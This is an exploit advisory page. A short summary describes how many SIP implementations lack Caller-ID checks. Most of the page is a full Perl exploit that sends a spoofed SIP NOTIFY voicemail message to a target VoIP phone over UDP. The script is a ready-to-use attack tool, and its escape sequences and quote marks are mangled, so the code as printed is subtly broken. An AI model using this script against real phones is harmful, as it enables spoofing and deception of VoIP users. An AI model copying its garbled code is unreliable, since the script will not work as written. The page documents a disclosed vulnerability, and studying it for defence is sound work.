‘Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)’

Summary

As reported earlier, many SIP implementations do not perform proper Caller-ID checks. This allows an attacker to spoof various NOTIFY messages, such as call-waiting and voice-mail.
For more information see: Notify Message Spoofing Vulnerability With VoIP Phones

Credit:

‘The information has been provided by beSTORM.’


Details

‘#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-07-08 17:49
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;
my $repeated_type = ‘A’;

if (!$target)
{
 usage();

 print ‘No target has been supplied, reverting to 192.168.3.10.n’;
 $target = ‘192.168.3.10’;
}

my $attackerip = shift;
if (!$attackerip)
{
 usage();

 print ‘Attacker IP address has not been supplied, reverting to 192.168.3.52.n’;
 $attackerip = ‘192.168.3.52’;
}

my $attackedip = shift;
if (!$attackedip)
{
 usage();

 print ‘Contact IP address has not been supplied, reverting to 192.168.3.9.n’;
 $attackedip = ‘192.168.3.9’;
}

print ‘Will attack $target.n’;
print ‘Attacker IP address defined as: $attackeripn’;
print ‘Attacked IP address defined as: $attackedipn’;

my $target_port = 5060;

my $packet =<<END;
NOTIFY sip:username:password@$attackerip SIP/2.0r
To: <sip:$attackedip:$target_port>r
Via: SIP/2.0/UDP $attackedip:5060;branch=000000000000000r
From: ‘asterisk’ <sip:asterisk@$attackedip>;tag=000000000r
Contact: <sip:asterisk@$attackerip>r
Call-ID: 3121$attackedipr
CSeq: 102 NOTIFYr
User-Agent: Asterisk PBXr
Event: message-summaryr
Content-Type: application/simple-message-summaryr
Max-Forwards: 70r
Content-Length: 37r
r
Messages-Waiting: yesr
Voicemail: 3/2r
END

print ‘Sending: [$packet]n’;
print ‘Length: ‘.length($packet).’n’;

socket(PING, PF_INET, SOCK_DGRAM, getprotobyname(‘udp’));

my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);

send(PING, $packet, 0, $sendto) == length($packet) or die ‘cannot send to $target : $target_port : $!n’;

print ‘Done.n’;

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print (‘#’x50);
 print ‘n’;
 print ‘# $0 [hostname] [repeater] [attackerip] [attackedip]n’;
 print ‘# hostnamet-tThe host the packet will be sent to.n’;
 print ‘# repeatert-tThe number of times the character will be sent (repeated character $repeated_type).n’;
 print ‘# attackeript-tThe IP address from which the packet should ben’;
 print ‘tttaddressed from (doesn’t have to be your IP address).n’;
 print ‘# attackedipt-tThe IP address that you are contactingn’;
 print ‘ttt(doesn’t have to be the hostname IP’s address).n’;
 print ‘n’;
 print ‘Results may vary depending on how the remote host handles packets.n’;
 print ‘For example:n’;
 print ‘ * Some SIP Proxies won’t look into packets addressed to it (attackedip or attackerip).n’;
 print ‘ * Some SIP Routers won’t handle packets that aren’t addressed to it.n’;
 print ‘etcn’;
 print ‘n’;
}’

Categories: Exploits